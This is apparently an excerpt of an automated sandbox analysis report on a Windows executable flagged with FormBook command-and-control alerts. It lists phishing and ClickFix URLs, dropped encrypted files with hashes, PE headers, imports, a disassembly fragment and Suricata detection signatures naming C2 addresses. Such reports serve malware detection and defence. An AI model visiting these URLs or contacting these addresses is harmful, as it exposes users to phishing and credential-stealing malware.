                                                                                https://lapxae.clicks.mlsend.com/tf/c/eyJ2Ijoie1wiYVwiOjEyMDgyNzAsXCJsXCI6MTM5MTY5OTI3NzkzNzM5NDQ1LFwiclwiOjEzOTE2OTkzOTkzNjI0OTU2NH0iLCJzIjoiZjE4YTc4MTcwZGM2NmU1MSJ9Get hashmaliciousUnknownBrowse
                                                                                • 136.143.182.97
                                                                                https://zfrmz.com/T43PlTPOxp2IyD9DoPOmGet hashmaliciousUnknownBrowse
                                                                                • 204.141.33.178
                                                                                https://zfrmz.com/mH78Gmbnl9SICcogz2hNGet hashmaliciousHTMLPhisherBrowse
                                                                                • 136.143.183.178
                                                                                https://elizgallery.com/nazvanie.jsGet hashmaliciousUnknownBrowse
                                                                                • 136.143.182.100
                                                                                https://insights.zohorecruit.com/ck1/2d6f.390d3f0/70932e40-a754-11ef-acd6-525400d4bb1c/c4b396bcef628ee60a3903dd64a571f46a43eb4a/2?e=AP6yJbny%2BojaTRJMo4YN29y4982EEh70QglqvV8aiCoCwftyNixblJXLnLCBIbU9pdrCb4rbSvPbWtRnPycgQw%3D%3DGet hashmaliciousUnknownBrowse
                                                                                • 136.143.190.213
                                                                                https://ambir.com/ambir-card-scanners/Get hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                                                • 136.143.190.100
                                                                                https://ambir.com/Get hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                                                • 136.143.190.100
                                                                                https://ambir.com/ambir-card-scanners/Get hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                                                • 136.143.190.100
                                                                                https://survey.zohopublic.com/zs/vgD4wR?zs_inviteid=866013344e2f6aaa30b0ce407809ff4b0d38acd7a4d6d9a2d55a0c47c159f6e9c34cee84c0ae062d532f3595df8765a31f7ccf03139a238512f2651a2090e16588ff3419bfca1ac69a559cd5fae828ad0513007bb6027aa54609aaaac19105fd584cc3bb17bb47d293dc701ba5a6bd77f665a5da9d80af87cb85b75e21dda78f5000fcc3d269f6e9ec2c76b092c423bf52e740d96de252a5954cb783b05234a7a72dd1fe6a5fa3479d7eb3ca298088460a99dadbe55254008a429e21d26661260da6203e965d7b4225750c41d63434dfGet hashmaliciousHTMLPhisherBrowse
                                                                                • 136.143.191.104

                                                                                JA3 Fingerprints

                                                                                No context

                                                                                Dropped Files

                                                                                No context

                                                                                Created / dropped Files

                                                                                C:\Users\user\AppData\Local\Temp\3MZ6696O

                                                                                Download File
                                                                                Process:C:\Windows\SysWOW64\sethc.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                                Category:modified
                                                                                Size (bytes):196608
                                                                                Entropy (8bit):1.1215420383712111
                                                                                Encrypted:false
                                                                                SSDEEP:384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
                                                                                MD5:9A809AD8B1FDDA60760BB6253358A1DB
                                                                                SHA1:D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
                                                                                SHA-256:95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
                                                                                SHA-512:2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
                                                                                Malicious:false
                                                                                Reputation:moderate, very likely benign file
                                                                                Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\autC7D8.tmp

                                                                                Download File
                                                                                Process:C:\Users\user\Desktop\ek8LkB2Cgo.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):289280
                                                                                Entropy (8bit):7.992503502258425
                                                                                Encrypted:true
                                                                                SSDEEP:6144:sudf14Z4OA+aiVx9i5cDU09S/lV/od2KKQUTKJ7SdmDIXXiq6ZI:suU4wdV+GIUMQd2cUTKJ7omDYTN
                                                                                MD5:6831DD0CFF0CC16BDADFC5F1052363EC
                                                                                SHA1:A2916524D3F7329128EE965B70E5860E69E5AB69
                                                                                SHA-256:03BF1797D2E410F5FE7C9A0B8B5BC9135D952D1DF4A9E6F64CEE9667EA66BD37
                                                                                SHA-512:31A8944E87BDDF7D787991CDFF1CB26F6929111C262110716A42109F93AC49CA91BE3DA125CEFFA2AF5D029D98F81522F23F18EA4346466F7E0441232FD89182
                                                                                Malicious:false
                                                                                Reputation:low
                                                                                Preview:...X1RVAR2TN.74.CPX2RVA.2TN4C74WCPX2RVAV2TN4C74WCPX2RVAV2TN.C74Y\.V2._.w.U..bc\>0p(@=137_t-U-Y[#c2=. #/v[:np.d.:,4=._[Kr2TN4C74.BY..21.kR3..#P.M....21.L....#P.M....21..[7&.#P.WCPX2RVA.wTNxB64...2RVAV2TN.C55\B[X2.RAV2TN4C747PPX2BVAVBPN4Cw4WSPX2PVAP2TN4C74QCPX2RVAVBPN4A74WCPX0R..V2DN4S74WC@X2BVAV2TN$C74WCPX2RVAV2TN4C74WCPX2RVAV2TN4C74WCPX2RVAV2TN4C74WCPX2RVAV2TN4C74WCPX2RVAV2TN4C74WCPX2RVAV2TN4C74WCPX2RVAV2TN4C74WCPX2RVAV2TN4C74y75 FRVAbdPN4S74W.TX2BVAV2TN4C74WCPX.RV!V2TN4C74WCPX2RVAV2TN4C74WCPX2RVAV2TN4C74WCPX2RVAV2TN4C74WCPX2RVAV2TN4C74WCPX2RVAV2TN4C74WCPX2RVAV2TN4C74WCPX2RVAV2TN4C74WCPX2RVAV2TN4C74WCPX2RVAV2TN4C74WCPX2RVAV2TN4C74WCPX2RVAV2TN4C74WCPX2RVAV2TN4C74WCPX2RVAV2TN4C74WCPX2RVAV2TN4C74WCPX2RVAV2TN4C74WCPX2RVAV2TN4C74WCPX2RVAV2TN4C74WCPX2RVAV2TN4C74WCPX2RVAV2TN4C74WCPX2RVAV2TN4C74WCPX2RVAV2TN4C74WCPX2RVAV2TN4C74WCPX2RVAV2TN4C74WCPX2RVAV2TN4C74WCPX2RVAV2TN4C74WCPX2RVAV2TN4C74WCPX2RVAV2TN4C74WCPX2RVAV2TN4C74WCPX2RVAV2TN4C74WCPX2RVAV2TN4C74WCPX2RVAV2TN4C74WCPX2RVAV2TN4C74WCPX2RVA

                                                                                C:\Users\user\AppData\Local\Temp\polygamodioecious

                                                                                Download File
                                                                                Process:C:\Users\user\Desktop\ek8LkB2Cgo.exe
                                                                                File Type:data
                                                                                Category:modified
                                                                                Size (bytes):289280
                                                                                Entropy (8bit):7.992503502258425
                                                                                Encrypted:true
                                                                                SSDEEP:6144:sudf14Z4OA+aiVx9i5cDU09S/lV/od2KKQUTKJ7SdmDIXXiq6ZI:suU4wdV+GIUMQd2cUTKJ7omDYTN
                                                                                MD5:6831DD0CFF0CC16BDADFC5F1052363EC
                                                                                SHA1:A2916524D3F7329128EE965B70E5860E69E5AB69
                                                                                SHA-256:03BF1797D2E410F5FE7C9A0B8B5BC9135D952D1DF4A9E6F64CEE9667EA66BD37
                                                                                SHA-512:31A8944E87BDDF7D787991CDFF1CB26F6929111C262110716A42109F93AC49CA91BE3DA125CEFFA2AF5D029D98F81522F23F18EA4346466F7E0441232FD89182
                                                                                Malicious:false
                                                                                Reputation:low
                                                                                Preview:...X1RVAR2TN.74.CPX2RVA.2TN4C74WCPX2RVAV2TN4C74WCPX2RVAV2TN.C74Y\.V2._.w.U..bc\>0p(@=137_t-U-Y[#c2=. #/v[:np.d.:,4=._[Kr2TN4C74.BY..21.kR3..#P.M....21.L....#P.M....21..[7&.#P.WCPX2RVA.wTNxB64...2RVAV2TN.C55\B[X2.RAV2TN4C747PPX2BVAVBPN4Cw4WSPX2PVAP2TN4C74QCPX2RVAVBPN4A74WCPX0R..V2DN4S74WC@X2BVAV2TN$C74WCPX2RVAV2TN4C74WCPX2RVAV2TN4C74WCPX2RVAV2TN4C74WCPX2RVAV2TN4C74WCPX2RVAV2TN4C74WCPX2RVAV2TN4C74WCPX2RVAV2TN4C74WCPX2RVAV2TN4C74y75 FRVAbdPN4S74W.TX2BVAV2TN4C74WCPX.RV!V2TN4C74WCPX2RVAV2TN4C74WCPX2RVAV2TN4C74WCPX2RVAV2TN4C74WCPX2RVAV2TN4C74WCPX2RVAV2TN4C74WCPX2RVAV2TN4C74WCPX2RVAV2TN4C74WCPX2RVAV2TN4C74WCPX2RVAV2TN4C74WCPX2RVAV2TN4C74WCPX2RVAV2TN4C74WCPX2RVAV2TN4C74WCPX2RVAV2TN4C74WCPX2RVAV2TN4C74WCPX2RVAV2TN4C74WCPX2RVAV2TN4C74WCPX2RVAV2TN4C74WCPX2RVAV2TN4C74WCPX2RVAV2TN4C74WCPX2RVAV2TN4C74WCPX2RVAV2TN4C74WCPX2RVAV2TN4C74WCPX2RVAV2TN4C74WCPX2RVAV2TN4C74WCPX2RVAV2TN4C74WCPX2RVAV2TN4C74WCPX2RVAV2TN4C74WCPX2RVAV2TN4C74WCPX2RVAV2TN4C74WCPX2RVAV2TN4C74WCPX2RVAV2TN4C74WCPX2RVAV2TN4C74WCPX2RVA

                                                                                Static File Info

                                                                                General

                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                Entropy (8bit):7.163296477779637
                                                                                TrID:
                                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                File name:ek8LkB2Cgo.exe
                                                                                File size:1'229'824 bytes
                                                                                MD5:0e566d86bc0eb9416765e07f7ba17392
                                                                                SHA1:2e1611cb6b9475a463765c05c0a3819d4ae9fd25
                                                                                SHA256:00852cad9ef3c816fa777f405bda3d30a62fbaed64a2489ce859b30734705959
                                                                                SHA512:89b2748a296799614ab4c63ffc4fcce44abab0e1af9be8a148919dde6e524b05ac0a068e282305f542a709d6a73cba7076d0752a41d3bdeccf72ddc7667d68b7
                                                                                SSDEEP:24576:wtb20pkaCqT5TBWgNQ7avowwXwWk2LKduNrOQe7GUo6A:5Vg5tQ7avoww7k2JOf7Gx5
                                                                                TLSH:3845CF1373DE8361C3B25273BA557701AEBF78250AB4F96B2FD4093DE920122525EA73
                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d..............'.a.....H.k.....H.h.....H.i......}%......}5...............~.......k.......o.......1.......j.....Rich...........

                                                                                File Icon

                                                                                Icon Hash:aaf3e3e3938382a0

                                                                                Static PE Info

                                                                                General

                                                                                Entrypoint:0x425f74
                                                                                Entrypoint Section:.text
                                                                                Digitally signed:false
                                                                                Imagebase:0x400000
                                                                                Subsystem:windows gui
                                                                                Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                Time Stamp:0x6747C97D [Thu Nov 28 01:38:05 2024 UTC]
                                                                                TLS Callbacks:
                                                                                CLR (.Net) Version:
                                                                                OS Version Major:5
                                                                                OS Version Minor:1
                                                                                File Version Major:5
                                                                                File Version Minor:1
                                                                                Subsystem Version Major:5
                                                                                Subsystem Version Minor:1
                                                                                Import Hash:3d95adbf13bbe79dc24dccb401c12091

                                                                                Entrypoint Preview

                                                                                Instruction
                                                                                call 00007F1AECEDA83Fh
                                                                                jmp 00007F1AECECD854h
                                                                                int3
                                                                                int3
                                                                                push edi
                                                                                push esi
                                                                                mov esi, dword ptr [esp+10h]
                                                                                mov ecx, dword ptr [esp+14h]
                                                                                mov edi, dword ptr [esp+0Ch]
                                                                                mov eax, ecx
                                                                                mov edx, ecx
                                                                                add eax, esi
                                                                                cmp edi, esi
                                                                                jbe 00007F1AECECD9DAh
                                                                                cmp edi, eax
                                                                                jc 00007F1AECECDD3Eh
                                                                                bt dword ptr [004C0158h], 01h
                                                                                jnc 00007F1AECECD9D9h
                                                                                rep movsb
                                                                                jmp 00007F1AECECDCECh
                                                                                cmp ecx, 00000080h
                                                                                jc 00007F1AECECDBA4h
                                                                                mov eax, edi
                                                                                xor eax, esi
                                                                                test eax, 0000000Fh
                                                                                jne 00007F1AECECD9E0h
                                                                                bt dword ptr [004BA370h], 01h
                                                                                jc 00007F1AECECDEB0h
                                                                                bt dword ptr [004C0158h], 00000000h
                                                                                jnc 00007F1AECECDB7Dh
                                                                                test edi, 00000003h
                                                                                jne 00007F1AECECDB8Eh
                                                                                test esi, 00000003h
                                                                                jne 00007F1AECECDB6Dh
                                                                                bt edi, 02h
                                                                                jnc 00007F1AECECD9DFh
                                                                                mov eax, dword ptr [esi]
                                                                                sub ecx, 04h
                                                                                lea esi, dword ptr [esi+04h]
                                                                                mov dword ptr [edi], eax
                                                                                lea edi, dword ptr [edi+04h]
                                                                                bt edi, 03h
                                                                                jnc 00007F1AECECD9E3h
                                                                                movq xmm1, qword ptr [esi]
                                                                                sub ecx, 08h
                                                                                lea esi, dword ptr [esi+08h]
                                                                                movq qword ptr [edi], xmm1
                                                                                lea edi, dword ptr [edi+08h]
                                                                                test esi, 00000007h
                                                                                je 00007F1AECECDA35h
                                                                                bt esi, 03h
                                                                                jnc 00007F1AECECDA88h
                                                                                movdqa xmm1, dqword ptr [esi+00h]

                                                                                Rich Headers

                                                                                Programming Language:
                                                                                • [ C ] VS2008 SP1 build 30729
                                                                                • [IMP] VS2008 SP1 build 30729
                                                                                • [ASM] VS2012 UPD4 build 61030
                                                                                • [RES] VS2012 UPD4 build 61030
                                                                                • [LNK] VS2012 UPD4 build 61030

                                                                                Data Directories

                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0xb70040x17c.rdata
                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0xc40000x6328c.rsrc
                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x1280000x6c4c.reloc
                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x8d8d00x1c.rdata
                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xb27300x40.rdata
                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x8d0000x860.rdata
                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                Sections

                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                .text0x10000x8b54f0x8b600f437a6545e938612764dbb0a314376fcFalse0.5699499019058296data6.680413749210956IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                .rdata0x8d0000x2cc420x2ce00827ffd24759e8e420890ecf164be989eFalse0.330464397632312data5.770192333189168IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                .data0xba0000x9d540x6200e0a519f8e3a35fae0d9c2cfd5a4bacfcFalse0.16402264030612246data2.002691099965349IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                .rsrc0xc40000x6328c0x63400e2dd302ef8e66d5bd516aa9bf6b15729False0.9336109689861462data7.907334592656929IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                .reloc0x1280000xa4740xa6000bc98f8631ef0bde830a7f83bb06ff08False0.5017884036144579data5.245426654116355IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                Resources

                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                RT_ICON0xc45a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                                                RT_ICON0xc46d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                                                RT_ICON0xc47f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                                RT_ICON0xc49200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                                                                RT_ICON0xc4c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                                                                RT_ICON0xc4d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                                                                RT_ICON0xc5bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                                                                RT_ICON0xc64800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                                                                RT_ICON0xc69e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                                                                RT_ICON0xc8f900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                                                                RT_ICON0xca0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                                                                RT_MENU0xca4a00x50dataEnglishGreat Britain0.9
                                                                                RT_STRING0xca4f00x594dataEnglishGreat Britain0.3333333333333333
                                                                                RT_STRING0xcaa840x68adataEnglishGreat Britain0.2747909199522103
                                                                                RT_STRING0xcb1100x490dataEnglishGreat Britain0.3715753424657534
                                                                                RT_STRING0xcb5a00x5fcdataEnglishGreat Britain0.3087467362924282
                                                                                RT_STRING0xcbb9c0x65cdataEnglishGreat Britain0.34336609336609336
                                                                                RT_STRING0xcc1f80x466dataEnglishGreat Britain0.3605683836589698
                                                                                RT_STRING0xcc6600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                                                RT_RCDATA0xcc7b80x5a593data1.0003269678193407
                                                                                RT_GROUP_ICON0x126d4c0x76dataEnglishGreat Britain0.6610169491525424
                                                                                RT_GROUP_ICON0x126dc40x14dataEnglishGreat Britain1.25
                                                                                RT_GROUP_ICON0x126dd80x14dataEnglishGreat Britain1.15
                                                                                RT_GROUP_ICON0x126dec0x14dataEnglishGreat Britain1.25
                                                                                RT_VERSION0x126e000xdcdataEnglishGreat Britain0.6181818181818182
                                                                                RT_MANIFEST0x126edc0x3b0ASCII text, with CRLF line terminatorsEnglishGreat Britain0.5116525423728814

                                                                                Imports

                                                                                DLLImport
                                                                                WSOCK32.dll__WSAFDIsSet, recv, send, setsockopt, ntohs, recvfrom, select, WSAStartup, htons, accept, listen, bind, closesocket, connect, WSACleanup, ioctlsocket, sendto, WSAGetLastError, inet_addr, gethostbyname, gethostname, socket
                                                                                VERSION.dllGetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
                                                                                WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                                COMCTL32.dllImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_Create, InitCommonControlsEx, ImageList_ReplaceIcon
                                                                                MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                                                                WININET.dllInternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetConnectW, InternetQueryDataAvailable
                                                                                PSAPI.DLLGetProcessMemoryInfo
                                                                                IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                                                                USERENV.dllUnloadUserProfile, DestroyEnvironmentBlock, CreateEnvironmentBlock, LoadUserProfileW
                                                                                UxTheme.dllIsThemeActive
                                                                                KERNEL32.dllHeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetCurrentThread, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, DeleteCriticalSection, WaitForSingleObject, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, CloseHandle, GetLastError, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, RaiseException, InitializeCriticalSectionAndSpinCount, InterlockedDecrement, InterlockedIncrement, CreateThread, DuplicateHandle, EnterCriticalSection, GetCurrentProcess, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, HeapSize, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, SetFilePointer, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, HeapReAlloc, WriteConsoleW, SetEndOfFile, DeleteFileW, SetEnvironmentVariableA
                                                                                USER32.dllSetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, DrawMenuBar, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, MonitorFromRect, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, CopyImage, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, UnregisterHotKey, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, DeleteMenu, PeekMessageW, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, CharLowerBuffW, GetWindowTextW
                                                                                GDI32.dllSetPixel, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, GetDeviceCaps, CloseFigure, LineTo, AngleArc, CreateCompatibleBitmap, CreateCompatibleDC, MoveToEx, Ellipse, PolyDraw, BeginPath, SelectObject, StretchBlt, GetDIBits, DeleteDC, GetPixel, CreateDCW, GetStockObject, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, EndPath
                                                                                COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                                                                ADVAPI32.dllGetAclInformation, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, InitiateSystemShutdownExW, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, SetSecurityDescriptorDacl, AddAce, GetAce
                                                                                SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                                                ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
                                                                                OLEAUT32.dllRegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, UnRegisterTypeLib, SafeArrayCreateVector, SysAllocString, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, QueryPathOfRegTypeLib, VariantCopy, VariantClear, CreateDispTypeInfo, CreateStdDispatch, DispCallFunc, VariantChangeType, SafeArrayAllocDescriptorEx, VariantInit

                                                                                Possible Origin

                                                                                Language of compilation systemCountry where language is spokenMap
                                                                                EnglishGreat Britain

                                                                                Network Behavior

                                                                                Suricata IDS Alerts

                                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                2024-12-04T15:31:24.306593+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.749771172.67.185.680TCP
                                                                                2024-12-04T15:31:49.735217+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.749825156.251.17.22480TCP
